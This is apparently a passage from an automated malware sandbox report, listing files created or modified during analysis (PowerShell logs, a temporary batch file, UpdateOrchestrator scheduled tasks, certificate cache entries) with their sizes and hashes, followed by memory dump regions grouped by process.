                                                                                                                            SHA1

                                                                                                                            37f7023b735b3f8cd65803bc704ad529f896ff4a

                                                                                                                            SHA256

                                                                                                                            dc4f64ba228c5d301a8d64bd8c172b45779583375d3c1be3c83c3cd1c7d2a5e3

                                                                                                                            SHA512

                                                                                                                            88af5a007d8d21b057740f42ebea3c4fe529924637b2c6b027ed520905ee8445f6b70d7a069457f82134e2c4405b0641f7620adccd8abb1c2ca1dd62cd127955

                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                                                                            Filesize

                                                                                                                            2KB

                                                                                                                            MD5

                                                                                                                            d85ba6ff808d9e5444a4b369f5bc2730

                                                                                                                            SHA1

                                                                                                                            31aa9d96590fff6981b315e0b391b575e4c0804a

                                                                                                                            SHA256

                                                                                                                            84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                                                                                                                            SHA512

                                                                                                                            8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                            Filesize

                                                                                                                            944B

                                                                                                                            MD5

                                                                                                                            d28a889fd956d5cb3accfbaf1143eb6f

                                                                                                                            SHA1

                                                                                                                            157ba54b365341f8ff06707d996b3635da8446f7

                                                                                                                            SHA256

                                                                                                                            21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45

                                                                                                                            SHA512

                                                                                                                            0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c

                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                            Filesize

                                                                                                                            944B

                                                                                                                            MD5

                                                                                                                            83685d101174171875b4a603a6c2a35c

                                                                                                                            SHA1

                                                                                                                            37be24f7c4525e17fa18dbd004186be3a9209017

                                                                                                                            SHA256

                                                                                                                            0c557845aab1da497bbff0e8fbe65cabf4cb2804b97ba8ae8c695a528af70870

                                                                                                                            SHA512

                                                                                                                            005a97a8e07b1840abdcef86a7881fd9bdc8acbfdf3eafe1dceb6374060626d81d789e57d87ca4096a39e28d5cca00f8945edff0a747591691ae75873d2b3fb5

                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                            Filesize

                                                                                                                            944B

                                                                                                                            MD5

                                                                                                                            cf79136142125a14a0d763b303b2effd

                                                                                                                            SHA1

                                                                                                                            20c496b9c84ddb9c365d6c59823660768c9dfdf7

                                                                                                                            SHA256

                                                                                                                            38297561076f05a1d94b8c6273098acc6866a563466e6a62e1c75846210715e3

                                                                                                                            SHA512

                                                                                                                            37e871507b221658b17bc7b1e100a695ed2ddcd5fa39176dc0ee858c7ef78d279699cd493532e1c95774f3b8a869d6a1d8fa3096314ba17025ec0041e2033522

                                                                                                                          • C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749

                                                                                                                            Filesize

                                                                                                                            290B

                                                                                                                            MD5

                                                                                                                            57b35e5af8da8f7760cf7c70fa2d1a3b

                                                                                                                            SHA1

                                                                                                                            b5ea79f2518973602be8b6feae68056f0c5700cc

                                                                                                                            SHA256

                                                                                                                            9e0b0c2cfc2115523e03ef4c17819786d8bf577e7f4ca79d8cb3c01c25aa5b36

                                                                                                                            SHA512

                                                                                                                            38973006093a0dcf8e269337ef00ab82cf0626e5cf624aaebea5af4bf1b7a2aae87251fd979788579fb9c72b03eae158ca5f12b4f4614000d30e3103dbd758ef

                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\tmp3042.tmp.bat

                                                                                                                            Filesize

                                                                                                                            145B

                                                                                                                            MD5

                                                                                                                            8c317368986510961315209e262814ba

                                                                                                                            SHA1

                                                                                                                            208c2cf195e5ce173993c7074227a624da002c4b

                                                                                                                            SHA256

                                                                                                                            5c2c74ef003204c3c7d2b170425b8fa0c2f61fb78708d2ea8f47aed03db056c6

                                                                                                                            SHA512

                                                                                                                            c1c03c382b1a1310bfd2d5f64f7478d59eb781bd66b74e8466812722910226fbe8f3ccc6e5ca5ff0f8712ff96672e0b2b9a9db59e9df705721880f4b11bcbbf8

                                                                                                                          • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work

                                                                                                                            Filesize

                                                                                                                            2KB

                                                                                                                            MD5

                                                                                                                            8abf2d6067c6f3191a015f84aa9b6efe

                                                                                                                            SHA1

                                                                                                                            98f2b0a5cdb13cd3d82dc17bd43741bf0b3496f7

                                                                                                                            SHA256

                                                                                                                            ee18bd3259f220c41062abcbe71a421da3e910df11b9f86308a16cdc3a66fbea

                                                                                                                            SHA512

                                                                                                                            c2d686a6373efcff583c1ef50c144c59addb8b9c4857ccd8565cd8be3c94b0ac0273945167eb04ebd40dfb0351e4b66cffe4c4e478fb7733714630a11f765b63

                                                                                                                          • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work

                                                                                                                            Filesize

                                                                                                                            2KB

                                                                                                                            MD5

                                                                                                                            f313c5b4f95605026428425586317353

                                                                                                                            SHA1

                                                                                                                            06be66fa06e1cffc54459c38d3d258f46669d01a

                                                                                                                            SHA256

                                                                                                                            129d0b993cd3858af5b7e87fdf74d8e59e6f2110184b5c905df8f5f6f2c39d8b

                                                                                                                            SHA512

                                                                                                                            b87a829c86eff1d10e1590b18a9909f05101a535e5f4cef914a4192956eb35a8bfef614c9f95d53783d77571687f3eb3c4e8ee2f24d23ad24e0976d8266b8890

                                                                                                                          • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work

                                                                                                                            Filesize

                                                                                                                            2KB

                                                                                                                            MD5

                                                                                                                            ceb7caa4e9c4b8d760dbf7e9e5ca44c5

                                                                                                                            SHA1

                                                                                                                            a3879621f9493414d497ea6d70fbf17e283d5c08

                                                                                                                            SHA256

                                                                                                                            98c054088df4957e8d6361fd2539c219bcf35f8a524aad8f5d1a95f218e990e9

                                                                                                                            SHA512

                                                                                                                            1eddfbf4cb62d3c5b4755a371316304aaeabb00f01bad03fb4f925a98a2f0824f613537d86deddd648a74d694dc13ed5183e761fdc1ec92589f6fa28beb7fbff

                                                                                                                          • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work

                                                                                                                            Filesize

                                                                                                                            2KB

                                                                                                                            MD5

                                                                                                                            7d612892b20e70250dbd00d0cdd4f09b

                                                                                                                            SHA1

                                                                                                                            63251cfa4e5d6cbf6fb14f6d8a7407dbe763d3f5

                                                                                                                            SHA256

                                                                                                                            727c9e7b91e144e453d5b32e18f12508ee84dabe71bc852941d9c9b4923f9e02

                                                                                                                            SHA512

                                                                                                                            f8d481f3300947d49ce5ab988a9d4e3154746afccc97081cbed1135ffb24fc107203d485dda2d5d714e74e752c614d8cfd16781ea93450fe782ffae3f77066d1

                                                                                                                          • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work

                                                                                                                            Filesize

                                                                                                                            2KB

                                                                                                                            MD5

                                                                                                                            1e8e2076314d54dd72e7ee09ff8a52ab

                                                                                                                            SHA1

                                                                                                                            5fd0a67671430f66237f483eef39ff599b892272

                                                                                                                            SHA256

                                                                                                                            55f203d6b40a39a6beba9dd3a2cb9034284f49578009835dd4f0f8e1db6ebe2f

                                                                                                                            SHA512

                                                                                                                            5b0c97284923c4619d9c00cba20ce1c6d65d1826abe664c390b04283f7a663256b4a6efe51f794cb5ec82ccea80307729addde841469da8d041cbcfd94feb0f6

                                                                                                                          • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work

                                                                                                                            Filesize

                                                                                                                            2KB

                                                                                                                            MD5

                                                                                                                            0b990e24f1e839462c0ac35fef1d119e

                                                                                                                            SHA1

                                                                                                                            9e17905f8f68f9ce0a2024d57b537aa8b39c6708

                                                                                                                            SHA256

                                                                                                                            a1106ed0845cd438e074344e0fe296dc10ee121a0179e09398eaaea2357c614a

                                                                                                                            SHA512

                                                                                                                            c65ba42fc0a2cb0b70888beb8ca334f7d5a8eaf954a5ef7adaecbcb4ce8d61b34858dfd9560954f95f59b4d8110a79ceaa39088b6a0caf8b42ceda41b46ec4a4

                                                                                                                          • C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

                                                                                                                            Filesize

                                                                                                                            328B

                                                                                                                            MD5

                                                                                                                            c5798fe28576e3869ed7ce072cfc503d

                                                                                                                            SHA1

                                                                                                                            b3530eadff344768e719c55edf11f38c7c8ff6c9

                                                                                                                            SHA256

                                                                                                                            77d2a5d2517778e4bb176d7c347582e70abc0e7a852b3c9f91480e870bf01d75

                                                                                                                            SHA512

                                                                                                                            64663bb398e838bf511adc9675fbb2a3f5c0c9996a654b99eb30d57887e8fbff5608e44d6391eaad67133ec4a9fd46781b69a81fc9fff7198a15b86db75098b6

                                                                                                                          • C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749

                                                                                                                            Filesize

                                                                                                                            330B

                                                                                                                            MD5

                                                                                                                            42832ec0b75b76a077c604f931f5c1ad

                                                                                                                            SHA1

                                                                                                                            1a913447077e53e47a1e32a18cb13d2d73784970

                                                                                                                            SHA256

                                                                                                                            746d0f3ea613a2131cf5ffbd6a941b3aed77c1e4804e4ccf7106ec072bd640b2

                                                                                                                            SHA512

                                                                                                                            fe203f3de8f2d0c8d0f27ff21a0a98b87b049baf7693296d72df29ec98c6a364caff8ba3f8cd17833323bc09ae72d995b6153cc1e0d65c3ac8f3d8ea76968ffc

                                                                                                                          • C:\Windows\Temp\__PSScriptPolicyTest_l2ji31pk.wms.ps1

                                                                                                                            Filesize

                                                                                                                            60B

                                                                                                                            MD5

                                                                                                                            d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                            SHA1

                                                                                                                            6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                            SHA256

                                                                                                                            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                            SHA512

                                                                                                                            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                          • C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9

                                                                                                                            Filesize

                                                                                                                            420B

                                                                                                                            MD5

                                                                                                                            1f13ad5be0fac35d83ee80c8c75ffd04

                                                                                                                            SHA1

                                                                                                                            240b7dae3a2dc8d5b0d098500aea0fb7c80170f9

                                                                                                                            SHA256

                                                                                                                            95dab46ebada30571d323a6d44649e59db446a2b8a0b6c3ddb697bceb9e50965

                                                                                                                            SHA512

                                                                                                                            51ea8f4525378309ca759cc9b1c29f6a50ec81257f7c62b91d701a260fef118128a7bf916a562985922db8c9b2b04fa31561039de3f8c17ce8bb8d21430b389a

                                                                                                                          • memory/336-100-0x0000015E74EC0000-0x0000015E74EEA000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            168KB

                                                                                                                          • memory/336-94-0x0000015E74EC0000-0x0000015E74EEA000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            168KB

                                                                                                                          • memory/336-99-0x0000015E74EC0000-0x0000015E74EEA000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            168KB

                                                                                                                          • memory/624-62-0x00007FFC5CC30000-0x00007FFC5CC40000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            64KB

                                                                                                                          • memory/624-57-0x00000224D4A60000-0x00000224D4A8A000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            168KB

                                                                                                                          • memory/624-60-0x00000224D4A60000-0x00000224D4A8A000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            168KB

                                                                                                                          • memory/624-58-0x00000224D4A60000-0x00000224D4A8A000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            168KB

                                                                                                                          • memory/624-61-0x00000224D4A60000-0x00000224D4A8A000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            168KB

                                                                                                                          • memory/624-59-0x00000224D4A60000-0x00000224D4A8A000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            168KB

                                                                                                                          • memory/624-50-0x00000224D4A30000-0x00000224D4A54000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            144KB

                                                                                                                          • memory/624-51-0x00000224D4A60000-0x00000224D4A8A000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            168KB

                                                                                                                          • memory/624-52-0x00000224D4A60000-0x00000224D4A8A000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            168KB

                                                                                                                          • memory/676-1390-0x0000000000290000-0x00000000002AC000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            112KB

                                                                                                                          • memory/680-76-0x00007FFC5CC30000-0x00007FFC5CC40000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            64KB

                                                                                                                          • memory/680-75-0x000001D274A30000-0x000001D274A5A000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            168KB

                                                                                                                          • memory/680-74-0x000001D274A30000-0x000001D274A5A000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            168KB

                                                                                                                          • memory/680-73-0x000001D274A30000-0x000001D274A5A000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            168KB

                                                                                                                          • memory/680-72-0x000001D274A30000-0x000001D274A5A000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            168KB

                                                                                                                          • memory/680-71-0x000001D274A30000-0x000001D274A5A000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            168KB

                                                                                                                          • memory/680-66-0x000001D274A30000-0x000001D274A5A000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            168KB

                                                                                                                          • memory/960-85-0x00000181715F0000-0x000001817161A000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            168KB

                                                                                                                          • memory/960-80-0x00000181715F0000-0x000001817161A000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            168KB

                                                                                                                          • memory/960-86-0x00000181715F0000-0x000001817161A000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            168KB

                                                                                                                          • memory/960-87-0x00000181715F0000-0x000001817161A000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            168KB

                                                                                                                          • memory/960-88-0x00000181715F0000-0x000001817161A000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            168KB

                                                                                                                          • memory/960-89-0x00000181715F0000-0x000001817161A000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            168KB

                                                                                                                          • memory/960-90-0x00007FFC5CC30000-0x00007FFC5CC40000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            64KB

                                                                                                                          • memory/1288-0-0x00007FFC7EB33000-0x00007FFC7EB35000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            8KB

                                                                                                                          • memory/1288-1-0x0000000000C90000-0x0000000000CD8000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            288KB

                                                                                                                          • memory/1396-1261-0x00007FFC7EB30000-0x00007FFC7F5F1000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            10.8MB

                                                                                                                          • memory/1396-889-0x00007FFC7EB30000-0x00007FFC7F5F1000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            10.8MB

                                                                                                                          • memory/1396-1184-0x00007FFC7EB30000-0x00007FFC7F5F1000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            10.8MB

                                                                                                                          • memory/1396-22-0x00000000005E0000-0x00000000005FC000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            112KB

                                                                                                                          • memory/1396-23-0x00007FFC7EB30000-0x00007FFC7F5F1000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            10.8MB

                                                                                                                          • memory/1396-1462-0x00007FFC7EB30000-0x00007FFC7F5F1000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            10.8MB

                                                                                                                          • memory/3744-35-0x00007FFC9CBB0000-0x00007FFC9CDA5000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            2.0MB

                                                                                                                          • memory/3744-33-0x000001B930C30000-0x000001B930C52000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            136KB

                                                                                                                          • memory/3744-34-0x000001B949220000-0x000001B94924A000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            168KB

                                                                                                                          • memory/3744-36-0x00007FFC9C370000-0x00007FFC9C42E000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            760KB

                                                                                                                          • memory/4992-44-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            32KB

                                                                                                                          • memory/4992-37-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            32KB

                                                                                                                          • memory/4992-40-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            32KB

                                                                                                                          • memory/4992-39-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            32KB

                                                                                                                          • memory/4992-38-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            32KB

                                                                                                                          • memory/4992-46-0x00007FFC9C370000-0x00007FFC9C42E000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            760KB

                                                                                                                          • memory/4992-47-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            32KB

                                                                                                                          • memory/4992-45-0x00007FFC9CBB0000-0x00007FFC9CDA5000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            2.0MB